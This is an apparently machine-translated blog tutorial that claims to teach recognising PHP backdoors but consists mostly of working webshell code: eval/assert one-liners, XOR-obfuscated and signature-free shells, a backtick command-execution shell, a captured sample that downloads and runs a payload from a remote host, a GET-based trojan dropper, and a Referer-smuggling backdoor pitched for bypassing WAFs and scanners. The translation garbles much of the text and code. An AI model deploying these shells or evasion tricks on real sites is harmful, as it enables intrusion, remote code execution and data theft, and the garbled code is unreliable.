To teach you to identify simple and easy to avoid PHP backdoor _php tips

One of the most common words that the back door might write like this

<?php @eval ($_post[' cmd ']);? >

Or so

<?php @assert ($_post[' cmd ']);? >

Tudouya students on the freebuf to give [a structural skill] using

Copy Code code as follows:

<?php @$_++; $_ = 1 $__= ("#" ^ "|"); // $__ = _   $__.=("." ^"~"); _p $__.= ("/" ^ ""); _po $__.= ("|") ^"/");  _pos $__.= ("{" ^ "/");//_post ${$__}[!$_] (${$__}[$_));//$_post[0] ($_post[1); ?>

Construction generation, of course, too intuitive to be able to write like this

Copy Code code as follows:

<?php @$_++;$__= ("#" ^ "|"). ("." ^"~"). ("/"^"`"). ("|" ^"/"). ("{"^"/");@${$__}[!$_](${$__}[$_]);? >

Then fill in some common code to disguise, a simple "kill" shell sample appears

Let's take a look at the simplest back-door PHP history.

Directly on the code:

<?php
 
$c =urldecode ($_get[' C ']); if ($c) {' $c ';} Complete
 
!$_get[' C ']| | ' {$_get[' C ']} ';/compact
 
/*******************************************************
 * principle: Php ' symbol contains will be executed as System command
 * Example: Http://host/?c=type%20config.php>config.txt
 *    then you can download Config.txt view content!
 *    You can try more perverted orders, do not do bad things oh!
 *******************************************************/

The principle is that PHP will directly to the ' symbol (note: not single quotes) contained in the content of the resolution to the system command execution! This will allow the expansion of the free metamorphosis!

And look at the same simple piece of code.

<?php 
preg_replace ("/[errorpage]/e", @str_rot13 (' @nffreg ($_cbfg[cntr); '), "Saft"); 
> 

Password page

Recently captured a PHP based on the implementation of the Webshell sample, its clever code dynamic generation, the wretched of their own page camouflage techniques, let us in the process of analyzing this sample feel quite a lot of fun. Next let us share this wonderful webshell together.

The Webshell code is as follows:

<?php
error_reporting (0);
Session_Start ();
Header ("Content-type:text/html;charset=utf-8"); if (Empty ($_session[' API '))
$_session[' API ']=substr (file_ Get_contents (
sprintf ('%s?%s '), Pack ("h*",
' 687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′), Uniqid ()), 3649);
@preg_replace ("~ (. *) ~ies", Gzuncompress ($_session[' API '), NULL);
? >

The key is to look at the following code,

Copy Code code as follows:

sprintf ('%s?%s ', pack ("h*", ' 687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′ ), Uniqid ())

After implementation here is actually a picture, decrypt the picture address as follows:

Http://7shell.googlecode.com/svn/make.jpg?53280b00f1e85
Then call the File_get_contents function to read the picture as a string, then substr 3649 bytes after the content, and then call Gzuncompress decompression, get the real code. Finally, the Preg_replace modifier E is invoked to execute the malicious code. Here execute the following statement to restore the malicious sample code,

Copy Code code as follows:

<?php
Echo gzuncompress (substr (file_get_contents) (sprintf ('%s?%s ', pack ("h*",
' 687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′), Uniqid ())), (3649));
?>

No feature hidden PHP Word:

   <?php 
session_start (); 
$_post [' Code '] && $_session [' thecode '] = Trim ($_post [' Code ']); 
$_session [' Thecode ']&&preg_replace (' \ ' a\ ' eis ', ' e '. ' V '. ' A '. ' L '. ' (Base64_decode ($_session[\ ' thecode\ ']) ', ' a '); 
? >
 

Assign the contents of the $_post[' code ' to $_session[' Thecode ', and then execute $_session[' Thecode ', the bright spot is no signature. Use the scanning tool to check the code, it will not alarm, to achieve the purpose.
Super Hidden PHP back door:

<?php $_get [A] ($_get [b]);? >

The Trojan is composed of a Get function only;
How to use:
? a=assert&b=${fputs%28fopen%28base64_decode%28yy5waha%29,w%29,base64_decode% 28pd9wahagqgv2ywwojf9qt1nuw2ndktsgpz4x%29%29};

After the execution of the current directory generation c.php a word trojan, when the argument for eval will be an error Trojan generation failure, for assert the same error, but will generate Trojan, really can not be belittled, simple word, is extended to such applications.
Level request, code run PHP back door:
This method is implemented in two files, file 1

 <?php 
//1.php 
header (' Content-type:text/html;charset=utf-8 '); 
Parse_str ($_server [' http_referer '], $a); 
if (reset ($a) = = ' && count ($a) = = 9) { 
eval (Base64_decode (Str_replace) ("", "+", implode (ARRA Y_slice ($a, 6))); 
} 

? >

File 2

 <?php 
//2.php 
header (' Content-type:text/html;charset=utf-8 '); 
The code to execute 
$code = <<<code 
phpinfo (); 
CODE; 
Base64 encoding 
$code = Base64_encode ($code); 
Constructs referer string 
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i="; 
Backdoor URL 
$url = ' http://localhost/test1/1.php '; 
$ch = Curl_init (); 
$options = Array ( 
curlopt_url => $url, 
curlopt_header => FALSE, 
curlopt_returntransfer => TRUE , 
curlopt_referer => $referer
); 
Curl_setopt_array ($ch, $options); 
Echocurl_exec ($ch); 

? >

The base64 code is run through the Http_referer in the HTTP request to achieve the back door effect, generally WAF to referer these tests to loosen a little, or not detect. With this idea bypass WAF good.

We have a learning mentality to deal with these PHP backdoor programs, a lot of PHP backdoor code to let us see how the programmers are very well-intentioned.